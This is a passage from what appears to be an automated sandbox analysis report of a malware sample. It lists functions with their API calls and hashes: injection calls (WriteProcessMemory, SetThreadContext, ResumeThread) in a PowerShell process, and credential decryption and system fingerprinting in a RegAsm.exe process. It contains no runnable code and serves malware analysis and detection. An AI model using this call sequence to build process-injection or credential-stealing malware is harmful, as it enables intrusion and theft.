WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04E56800

Memory Dump Source

Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f5cc0b6aad6121375db71033384d94666f48760faaee7500868b2b0e5980e850
Instruction ID: 30b847daed172c1dafd1905ab198a3e8f2d027ae2b7927c44898fa4308361f3d
Opcode Fuzzy Hash: f5cc0b6aad6121375db71033384d94666f48760faaee7500868b2b0e5980e850
Instruction Fuzzy Hash: 6D215AB19003599FDB10CFA9C845BEEBBF1FF88324F50842AE958A7250D778A954CB64

Function 04E56770 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04E56800

Memory Dump Source

Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5207e2b4b0c6e82bfd9ccadcb79ac72348415a90b4552a7273de9fbcd37d42f4
Instruction ID: b1f540b666f3db5667ed88516b8bf202bc4eb7bfc85ce3a91ad9f318cfb0a59e
Opcode Fuzzy Hash: 5207e2b4b0c6e82bfd9ccadcb79ac72348415a90b4552a7273de9fbcd37d42f4
Instruction Fuzzy Hash: C8213BB19003599FDB10CFA9C845BDEBBF5FF48324F108429E958A7250D778A554CBA4

Function 04E565D1 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E56656

Memory Dump Source

Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 911c47fd309406ac16738de74dbdc3568490501430cc18acd0184a2ad2239c93
Instruction ID: e871dfbd11e8def5f707fcb7e4ad82dd217f00cf740931a06455621e3a3bbbc3
Opcode Fuzzy Hash: 911c47fd309406ac16738de74dbdc3568490501430cc18acd0184a2ad2239c93
Instruction Fuzzy Hash: 2A216AB19002498FDB10DFAAC4857EFBBF4EF88324F54842ED459A7250C778A944CFA5

Function 04E565D8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E56656

Memory Dump Source

Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 17f1033fca62ff85b7e351ff6a2eeb2cfdbc2f1b57814da200e059a7a0e3e3dd
Instruction ID: aedff9b9e531a686c21229a783b0e68199232889deabf15bfa00a9be8120d630
Opcode Fuzzy Hash: 17f1033fca62ff85b7e351ff6a2eeb2cfdbc2f1b57814da200e059a7a0e3e3dd
Instruction Fuzzy Hash: 032149B1D003098FDB10DFAAC4857EEBBF4EF48324F54842AD459A7250DB78A984CFA5

Function 04E56526 Relevance: 1.6, APIs: 1, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 04E5658A

Memory Dump Source

Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 22f8b671e26ba0a9070784dc4c0b17e62edeadf117a85b167df69a630e7b22a7
Instruction ID: 80e93d3e8506192c6bb2a5ffa4fb5bdfe7631622b3eda0f0f8b2dc57a00e3342
Opcode Fuzzy Hash: 22f8b671e26ba0a9070784dc4c0b17e62edeadf117a85b167df69a630e7b22a7
Instruction Fuzzy Hash: FB116AB1D002488FCB20DFAAC4457EEFBF4EB88324F20881AD459A7610DB75A544CFA5

Function 04E56528 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 04E5658A

Memory Dump Source

Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3a347c19ff7a537244e1f713959a8487ba8a169510c97396c3fbc2491f6132af
Instruction ID: 4a5edd8836acf13a3c593d4589f431b07b6daa822a9846b38636fb591e5f5faa
Opcode Fuzzy Hash: 3a347c19ff7a537244e1f713959a8487ba8a169510c97396c3fbc2491f6132af
Instruction Fuzzy Hash: DF116AB1D002488FCB20DFAAC4457DEFBF4EB88324F208819C459A7210DB74A544CF94

Function 07912581 Relevance: 1.3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 07912646

Memory Dump Source

Source File: 00000005.00000002.1745060325.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7910000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 3cd99a4f9fe30617b353de38d61e8612d3d633a2b529107aefd2d9e6bceb6dab
Instruction ID: 2c7c6ba44d7277b8c950fd3b963d76dbcfead3731846902b1d7b41f159fff106
Opcode Fuzzy Hash: 3cd99a4f9fe30617b353de38d61e8612d3d633a2b529107aefd2d9e6bceb6dab
Instruction Fuzzy Hash: 9221B0F0B0470ACFCB14EF25C584A66BBF8BF46298F1580ABC408CB1A1D730D8A5CB91

Function 0314D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1736669008.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_314d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d1eb1c021e47d6c1b2d69d0f722425b8a813c3d2bf7a3e5bcfa7ed9a54ecff
Instruction ID: 0f091ade02ca5b2f6b43c600355d6a354872f8a6189131dc6fc9b14feaa64665
Opcode Fuzzy Hash: 78d1eb1c021e47d6c1b2d69d0f722425b8a813c3d2bf7a3e5bcfa7ed9a54ecff
Instruction Fuzzy Hash: D3018C6240D3C09FDB128B259C94752BFB8EF57224F0D85CBE8888F1A3D2699C45C772

Function 0314D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1736669008.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_314d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef898a87acce164fe39d584bc222141bd95416e385b81e17233d422c9fbba23a
Instruction ID: da3dc3f8c7911dc3dd3a9c331592549e87d3c79f91ddfc8ba1f143dc8f9ceb88
Opcode Fuzzy Hash: ef898a87acce164fe39d584bc222141bd95416e385b81e17233d422c9fbba23a
Instruction Fuzzy Hash: B401F7310093009BEB10CA25D984767FF98DF49324F1CC56AED484B147C779D882C6B1

Non-executed Functions

Function 07911109 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

$^q, xrefs: 07911152
$^q, xrefs: 0791115E
4'^q, xrefs: 0791117F
4'^q, xrefs: 07911173

Memory Dump Source

Source File: 00000005.00000002.1745060325.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7910000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: c4a21448f26fff2fbcf82a090028f294b0c2bb5b5ad3f29c9bd6795e04a37005
Instruction ID: 8d048034c7dc1ee26d16a8ead1f4a4ca6252384462185fbaa45137e22fcb932e
Opcode Fuzzy Hash: c4a21448f26fff2fbcf82a090028f294b0c2bb5b5ad3f29c9bd6795e04a37005
Instruction Fuzzy Hash: DE01D42274E38D6FC32B86692820166AFB65F8391032A45EBC140CF39BCD558D5AC3B3

Analysis Process: RegAsm.exePID: 7432, Parent PID: 7100COMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	61.6%
Total number of Nodes:	310
Total number of Limit Nodes:	9

Executed Functions

Function 00437DF0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 640
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
SysAllocString.OLEAUT32()\"^), ref: 004380C3
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
SysAllocString.OLEAUT32()\"^), ref: 0043817E
SysAllocString.OLEAUT32()\"^), ref: 00438238
VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
VariantClear.OLEAUT32(?), ref: 004383F9
SysFreeString.OLEAUT32(?), ref: 0043841D
SysFreeString.OLEAUT32(?), ref: 00438423
SysFreeString.OLEAUT32(00000000), ref: 00438430
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468

Strings

pq, xrefs: 004382E2
P%R, xrefs: 0043804A
.H4J, xrefs: 0043805A
O@, xrefs: 0043806A
)\"^, xrefs: 004380BE, 004380C2, 0043817D, 00438237, 0043845B

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: P%R$)\"^$.H4J$O@$pq
API String ID: 2573436264-1397720406
Opcode ID: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
Opcode Fuzzy Hash: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96

Function 00423860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A[, xrefs: 00423D14
WE, xrefs: 00423D04
Fg)i, xrefs: 00423E56
{\}, xrefs: 00423E3E
/G$I, xrefs: 00423E16
7N1@, xrefs: 00423ED0, 00423EE1
OU, xrefs: 00423CFC

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
API String ID: 0-1763234448
Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86

Function 00415799 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 492
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF

Strings

8MNO, xrefs: 00415C36
NDNK, xrefs: 00415D85
RXA, xrefs: 00415842
<I2K, xrefs: 00415C2B
X, xrefs: 00415DD2
~, xrefs: 0041596E
oA&C, xrefs: 00415CE6

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
API String ID: 834300711-3328159043
Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

Function 00409580 Relevance: 9.2, Strings: 7, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PK, xrefs: 004099E1
Tiec, xrefs: 00409963
+8=>, xrefs: 00409782
#4<7, xrefs: 00409772
E4BC9382A889E941AC8923850305D13E, xrefs: 00409642
r, xrefs: 004095F4
\, xrefs: 0040978A

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #4<7$+8=>$E4BC9382A889E941AC8923850305D13E$PK$Tiec$\$r
API String ID: 0-3160728341
Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46

Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 0040891C
GetCurrentThreadId.KERNEL32 ref: 00408925
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
GetForegroundWindow.USER32 ref: 00408A33

Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7

ExitProcess.KERNEL32 ref: 00408AD1

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

Function 0042DA53 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042DA87
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042DB5D

Strings

4*VP, xrefs: 0042DF24
0K), xrefs: 0042DF19

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName
String ID: 0K)$4*VP
API String ID: 3545744682-3626284114
Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66

Function 004096C1 Relevance: 6.6, Strings: 5, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PK, xrefs: 004099E1
Tiec, xrefs: 00409963
+8=>, xrefs: 00409782
#4<7, xrefs: 00409772
\, xrefs: 0040978A

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #4<7$+8=>$PK$Tiec$\
API String ID: 0-3498454814
Opcode ID: 08af39ec684b2e8c8c7539f0c50152cbd04d4d5768ce934c1ccd13a0086aca6c
Instruction ID: ec43dc8aada6c0e01d29c87bcd83570c0fdc998820d78b0374825785abd26213
Opcode Fuzzy Hash: 08af39ec684b2e8c8c7539f0c50152cbd04d4d5768ce934c1ccd13a0086aca6c
Instruction Fuzzy Hash: 2BA1F2766087508BC718CF25C85266FBBE1ABC1318F18593DE5D6DB391D738C905CB8A

Function 0043F720 Relevance: 4.1, Strings: 3, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

oQ3, xrefs: 0043F943
1234, xrefs: 0043F774
sQ3, xrefs: 0043F979

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: 1234$oQ3$sQ3
API String ID: 2994545307-3057079318
Opcode ID: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
Instruction ID: 8038275947b79c29346f8cf0c7e67bd1178385f5d69ec54105c16415a8137388
Opcode Fuzzy Hash: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
Instruction Fuzzy Hash: 8DB16472A083118FC728DF28C89056BB7E2EBC9314F19853DE99697365E735ED05CB82

Function 004218A0 Relevance: 3.2, Strings: 2, Instructions: 655
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!@, xrefs: 00421910
,, xrefs: 00421E6B

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !@$,
API String ID: 0-2321553346
Opcode ID: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
Instruction ID: 02546279eb0c4d83f3c4e3be5ab3571bc15c22c1dfd1b9922496e5385efd982e
Opcode Fuzzy Hash: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
Instruction Fuzzy Hash: DB4259B1E042648FDB04CF78D8813AEBFF1AF55310F59826ED895A7391C3798846CB86

Function 0043C1F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043C767 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

,+*), xrefs: 0043C790

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,+*)
API String ID: 0-3529585375
Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58

Function 0040B70C Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

o`, xrefs: 0040B74B

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: o`
API String ID: 0-3993896143
Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719

Function 004266D0 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
Instruction ID: 0d04b2c2fa50837e9638c4fbed55210e4b06bf37a5b46dbaee5e4e245b9bea77
Opcode Fuzzy Hash: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
Instruction Fuzzy Hash: 91B15C717043614BEB18DF24E85266B77A2EB81304F5AC53EE8859B386D63CDC09C79A

Function 0043ECA0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785

Function 00433CDF Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00433D17
GetSystemMetrics.USER32 ref: 00433D26

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 5f2d3bb2bc73d9fb24c3e71e22e052d5e824def969419b7e1f909697d2eb3c0f
Instruction ID: cb1e3e37586d9a4509bd606a09fc72fdf1ec5b4aeb0744265bd1e649f6a723a7
Opcode Fuzzy Hash: 5f2d3bb2bc73d9fb24c3e71e22e052d5e824def969419b7e1f909697d2eb3c0f
Instruction Fuzzy Hash: 2211AFF4D142188FDB40EF7CD98569DBBF4AB49304F10442AE498E7360E774A9988F86

Function 0042E4A9 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042E5D8

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d676d3cf378bce22c63fcc0d702ca03e1329d21923194e356a21209e6313a188
Instruction ID: bada183498579cd0d1e1b9560e2ec57dcdd73a114042e6aef25e130bccfe5e33
Opcode Fuzzy Hash: d676d3cf378bce22c63fcc0d702ca03e1329d21923194e356a21209e6313a188
Instruction Fuzzy Hash: C721297251C39089D735CB368810BEBBBE29FD6308F49CCADC4C847242E7794585C79A

Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043CCAF

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

Function 0043C180 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction ID: ec0cbf63999808cd9fde2cf832404b9ab0848eb4eaaead86bc709d6aa026588d
Opcode Fuzzy Hash: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction Fuzzy Hash: 59F0E977808211EBD2003F257C01A5736649F8F735F01587AFC0152112D739D422E6AF

Function 0043169A Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004316E1

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
Instruction ID: 88ab58616cf1dac6cba617d780c76543ffdeb80aa514c7c7d0db7b6f6353d972
Opcode Fuzzy Hash: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
Instruction Fuzzy Hash: 0FF09EB8509342CFD394DF64C5A875BBBE0EB89348F01891CE4998B391DBB59548CF82

Function 00430469 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004304AC

Memory Dump Source

